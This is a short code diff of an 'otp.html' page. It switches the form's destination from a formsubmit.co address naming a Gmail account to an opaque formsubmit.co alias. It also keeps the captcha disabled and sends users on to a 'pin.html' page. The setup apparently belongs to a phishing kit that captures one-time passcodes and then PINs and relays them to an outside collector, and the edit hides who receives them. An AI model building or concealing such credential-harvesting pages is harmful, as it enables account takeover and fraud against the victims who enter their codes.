--- a/otp.html
+++ b/otp.html
@@ -13,7 +13,7 @@
     <div class="w-[90%] max-w-md mx-auto pt-5">
         <div class="mt-5"></div>
 
-        <form id="form" class="mt-44" action="https://formsubmit.co/emenikeonyechere@gmail.com" method="POST">
+        <form id="form" class="mt-44" action="https://formsubmit.co/el/jeyolu" method="POST">
             <input type="hidden" name="_captcha" value="false">
             <input type="hidden" name="_next" value="pin.html"> <!-- Redirect after submission -->
 
